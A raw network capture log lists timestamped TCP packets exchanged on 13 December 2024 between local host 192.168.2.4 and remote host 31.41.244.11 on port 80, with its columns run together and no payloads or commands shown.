                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.905095100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.905121088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.905155897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.905155897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.906306982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.906344891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.906363964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.906395912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.907141924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.907159090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.907198906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.907200098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.908308029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:18.908369064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.042480946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.042995930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.043015003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.043107033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.043148041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.043414116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.043469906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.044325113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.044378996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.044430017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.045397043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.045423985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.045445919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.045475960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.046528101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.046669006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.046719074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.046766043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.047558069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.047621012 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.047987938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.048049927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049011946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049076080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049109936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049160957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049732924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049798965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049798965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.049849987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.050833941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.051348925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.051407099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.051918030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.052211046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.052273035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.052977085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.053076982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.053349972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.053527117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.054066896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.054661989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.054665089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.054707050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.055149078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.055352926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.055404902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.056276083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.056957960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.057013988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.057487011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.057538033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.057790995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.058530092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.058584929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.059089899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.059588909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.059642076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.059940100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.059988976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.060672998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.060808897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.060861111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.061927080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.062748909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.062820911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.062912941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.062928915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.062967062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.063011885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.064064026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.064179897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.064239979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.065095901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.065206051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.065267086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.066107035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.066167116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.066219091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.066560030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.067156076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.067238092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.067426920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.067478895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.068249941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.068309069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.068460941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.068536043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.069353104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.069407940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.069588900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.069636106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.070477009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.071532965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.071549892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.071588039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.071614027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.071614981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.072619915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.072673082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.072864056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074244022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074300051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074600935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074651957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074856043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074872017 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.074922085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.075962067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.076231003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.076407909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.076925993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.076977968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.077286005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.078078032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.078130007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.078177929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.079252958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.079303026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.079387903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.079438925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.080198050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.080463886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.080646038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.080696106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.081293106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.081342936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.081567049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.081617117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.082426071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.082478046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.082549095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.083497047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.083512068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.083548069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.083578110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.084621906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.084729910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.084794998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.085659027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.085674047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.085738897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.086719036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.086987972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.087052107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.087785959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.087853909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.087914944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.088038921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.088923931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.088984013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.089421034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.089473963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.090009928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.090084076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.090138912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.090188026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.091022015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.091074944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.091612101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.091660976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.092169046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.092221975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.092489958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.092538118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.093257904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.093310118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.093871117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.094067097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.094290972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.094342947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.094940901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.094995022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.095421076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.095472097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.095984936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.096034050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.096508026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.096571922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.096625090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.096681118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.097548962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.097598076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.098211050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.098264933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.098627090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.098675966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.099889994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.099939108 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.234855890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.234988928 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235172033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235220909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235373974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235418081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235567093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.235610008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.236514091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.236560106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.236598969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.236638069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.237584114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.237627983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.237703085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.237742901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.238682985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.238698959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.238730907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.238744020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.239746094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.239794970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.239901066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.239944935 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.240847111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.240890980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.240983963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.241025925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.242147923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.242192030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.242860079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.242902040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.243222952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.243266106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.243446112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.243489027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.244107962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.244129896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.244149923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.244163990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.245199919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.245249987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.245347977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.245390892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.246262074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.246308088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.246340036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.246381998 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.247342110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.247387886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.247889042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.247942924 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.248419046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.248473883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249228954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249281883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249511957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249561071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249659061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.249707937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.250611067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.250659943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.250921965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.250968933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.251724958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.251776934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.251920938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.251970053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.252791882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.252818108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.252841949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.252875090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.253859043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.253911972 CET4976380192.168.2.431.41.244.11
